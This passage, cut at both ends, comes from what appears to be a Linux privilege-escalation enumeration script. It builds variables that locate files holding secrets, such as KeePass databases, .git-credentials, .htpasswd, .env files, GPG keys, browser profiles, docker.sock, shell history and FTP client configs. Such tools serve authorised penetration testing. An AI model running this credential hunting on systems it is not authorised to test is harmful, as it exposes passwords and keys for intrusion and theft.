"$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) - PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) - PSTORAGE_SPLUNK=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "passwd$" | sort | uniq | head -n 70) - PSTORAGE_GITLAB=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E '/lib' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) - PSTORAGE_PGP_GPG=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E 'README.gnupg' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) - PSTORAGE_CACHE_VI=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) - PSTORAGE_DOCKER=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) - PSTORAGE_FIREFOX=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) - PSTORAGE_CHROME=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) - PSTORAGE_OPERA=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) - PSTORAGE_SAFARI=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) - PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_FASTCGI=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) - PSTORAGE_SNMP=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PYPIRC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.pypirc$" | sort | uniq | head -n 70) - PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "postfix$" | sort | uniq | head -n 70) - PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) - PSTORAGE_HISTORY=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) - PSTORAGE_HTTP_CONF=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HTPASSWD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) - PSTORAGE_LDAPRC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) - PSTORAGE_ENV=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.env$" | sort | uniq | head -n 70) - PSTORAGE_MSMTPRC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) - PSTORAGE_GITHUB=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) - PSTORAGE_SVN=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.svn$" | sort | uniq | head -n 70) - PSTORAGE_KEEPASS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) - PSTORAGE_FTP=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) - PSTORAGE_BIND=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/etc|^/usr|^/var" | grep -E "bind$" | sort | uniq | head -n 70) - PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "seeddms.*$" | sort | uniq | head -n 70) - PSTORAGE_DDCLIENT=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KCPASSWORD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "kcpassword$" | sort | uniq | head -n 70) - PSTORAGE_SENTRY=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) - PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "environments$" | sort | uniq | head -n 70) - PSTORAGE_CACTI=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "cacti$" | sort | uniq | head -n 70) - PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "roundcube$" | sort | uniq | head -n 70) - PSTORAGE_PASSBOLT=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) - PSTORAGE_WGET=$(echo -e 